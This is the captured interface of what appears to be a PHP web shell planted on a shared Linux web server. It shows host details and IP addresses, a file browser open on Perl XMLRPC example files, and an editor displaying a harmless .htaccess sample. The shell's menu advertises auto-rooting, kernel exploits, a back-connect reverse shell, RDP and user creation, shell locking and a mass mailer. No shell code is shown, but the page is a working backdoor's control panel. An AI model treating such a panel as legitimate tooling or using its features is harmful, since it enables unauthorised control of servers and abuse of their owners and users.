Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libsoap-lite-perl /
examples /
XMLRPC /
[ HOME SHELL ]
Name
Size
Permission
Action
mod_xmlrpc.htaccess
763
B
-rw-r--r--
simple1.pl
251
B
-rw-r--r--
xmlrpc.cgi
1.95
KB
-rw-r--r--
xmlrpc.daemon
2.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mod_xmlrpc.htaccess
# -- XMLRPC::Lite -- soaplite.com -- Copyright (C) 2001 Paul Kulchenko -- # put this file into mod_xmlrpc directory (for tests) or anywhere you want SetHandler perl-script PerlHandler Apache::XMLRPC::Lite # you may specify almost ANY method of XMLRPC::Transport::HTTP::Apache here # see documentation for more information # if more than one, parameters should be quoted and can be separated with commas PerlSetVar dispatch_to "/Your/Path/To/Deployed/Modules, \ Module::Name, Module::method" # or with spaces PerlSetVar objects_by_reference "My::PersistentIterator My::SessionIterator My::Chat" # for methods that accept hashes, specify parameters as "key1 => value1, key2 => value2" PerlSetVar options "compress_threshold => 10000"
Close